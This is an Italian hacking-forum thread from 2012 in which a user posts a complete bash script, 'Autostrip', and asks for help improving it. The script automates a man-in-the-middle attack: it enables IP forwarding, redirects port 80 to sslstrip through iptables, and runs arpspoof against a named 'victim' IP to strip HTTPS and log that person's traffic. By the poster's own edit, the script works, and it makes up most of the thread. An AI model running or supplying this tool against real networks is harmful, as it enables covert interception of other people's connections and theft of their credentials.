Author Topic: arpspoof-sslstrip  (Read 4659 times)

weVeg

  • Hero Member
  • *****
  • Posts: 737
    • View Profile
on: January 23, 2012, 09:16:24 PM
a) Non so se sia la sezione giusta, ma sembrava quella più adatta, nel caso spostate
b) Mi vergogno non poco per quello che sto per proporvi, ma 2 bicchieri di vino mi hanno reso immune all'ansia da prestazione
c) Abbiate pazienza, non sono un programmatore ma l'unica cosa per colmare le lacune è chiedere a voi di correggermi e suggerirmi....

dunque, partendo dal post del buon http://www.clshack.com/sslstrip-ettercap-attack-ssl-and-sniff-secure-connetions.html
ho deciso di fare uno script per gestire le operazioni in automatico, e questo è il risultato:
Code: [Select]
#!/bin/bash
#Autostrip
#Automazione SslStrip+arpspoof
#


DPORT="80" ; #Porta che voglio reindirizzare verso la TPORT
TPORT="1000" ; #Porta usata da SSLStrip, cambiala se vuoi o se occupata da altro!
IPF=/proc/sys/net/ipv4/ip_forward ;

# FUNZIONE DI AIUTO
fun_help () {
echo
echo
echo  "[-]Autostrip automatizza le operazioni comuni per lo sniffing"
echo  "[-]Reindirizza la porta 80 sulla porta 1000 di SSLStrip"
echo  "[-]Puoi modificare la \"to-port\" 1000, cambiando il valore di \"\$TPORT\""
echo  "[-]Devi avere installato sslstrip e arpspoof,"
echo  "[-]Esegui\"apt-get install sslstrip arpspoof\" in caso contrario"
echo  "[-]Utilizzo: ./autostrip.sh ip_gateway ip_vittima interfaccia"
echo  "[-]Inserisci i parametri nell'ordine esatto indicato."
echo  "[*]Esempio: ./autostrip.sh 192.168.0.1 192.168.0.100 wlan0"
echo  "[***]Usa la testa e Good Hack!"

exit
}
# FINE HELP

# CONTROLLO: UID, PARAMETRI, PROG. NECESSARI, IP_FORWARD
if [ $UID != "0" ]
then
echo "Non hai i permessi necessari per eseguire lo script! need to be root!" && fun_help
fi

which sslstrip || echo "sslstrip non è presente" exit ;
which arpspoof || echo "arpspoof non è presente" exit ;      


if [ `cat $IPF` = "0" ]
then
echo "attivo ip_forward che non lo era" && echo 1 > $IPF ;
else
echo "ip_forward già attivo"
fi

 
if [ $# != "3" ] #non controllo che gli indirizzi siano giusti, che si fotta!
then
echo "hai inserito $# parametri, devi inserirne 3" && fun_help
else
echo "Tutti i controlli superati con successo!!"
fi
# FINE DEI CONTROLLI

echo

# PREPARO IPTABLES
iptables -t nat -A PREROUTING -p tcp --destination-port $DPORT -j REDIRECT --to-port $TPORT
if [ $? != 0 ]
then
echo "impossibile scrivere le iptables" && fun_help
else
echo "iptables scritte con successo!"
fi
# FINE IPTABLES

echo

# RIEPILOGO
echo "[*]IP Gateway:$1"
echo "[*]IP Vittima:$2"
echo "[*]Interfaccia:$3"

echo -n "Premi si per continuare, n per abortire:[si] "
read TASTO
case $TASTO in
n)echo "esco!" && exit ;;
s)echo  ;;
*)echo  ;;
esac

echo "bella pe tte!"
# FINE RIEPILOGO

echo

# AVVIO SSLStrip
( xfce4-terminal -e "sslstrip -l $TPORT -w log_ssl -p -a" ) &
if [ $? != 0 ]
then
echo "sslstrip ha fallito" && fun_help
else
echo "sslstrip avviato con successo!"
fi
##
echo

#AVVIO ARPSPOOF
( xfce4-terminal -e  "arpspoof -i $3 -t $2 $1" ) &
if [ $? != 0 ]
then
echo "arpspoof ha fallito" && fun_help
else
echo "arpspoof avviato con successo!"
fi
##

echo




Funziona? ni! Nel senso non ci sono più errori ma è evidente che vada migliorato e poi, la cosa che mi preme di più è avviare arpspoof e sslstrip con processi separati ma purtroppo non riesco a trovare più vecchie dispense che mi mostravano come fare (son sicuro di aver letto qualcosa a proposito), ho provato anche con xterm -e      ma non funfa.... tra l'altro in questo modo girano in bg, forse sarebbe meglio in fg??? se qualche anima pia ha voglia di darmi qualche dritta, io son qui!
Grazie e scusate il disturbo!!!

edit:script aggiornato e funzionante... ora arpspoof e sslstrip si aprono in terminali separati e indipendenti!
« Last Edit: February 03, 2012, 07:55:07 PM by raffaele »

una voce libera è sempre liberatrice
under_r00t


devilnoe

  • Guest
Reply #1 on: January 24, 2012, 01:19:54 PM
please dude, english :hope:



weVeg

  • Hero Member
  • *****
  • Posts: 737
    • View Profile
Reply #2 on: January 24, 2012, 11:08:19 PM
please dude, english :hope:
this is just help request to improve my script... only this... nothing else!!
bye!

una voce libera è sempre liberatrice
under_r00t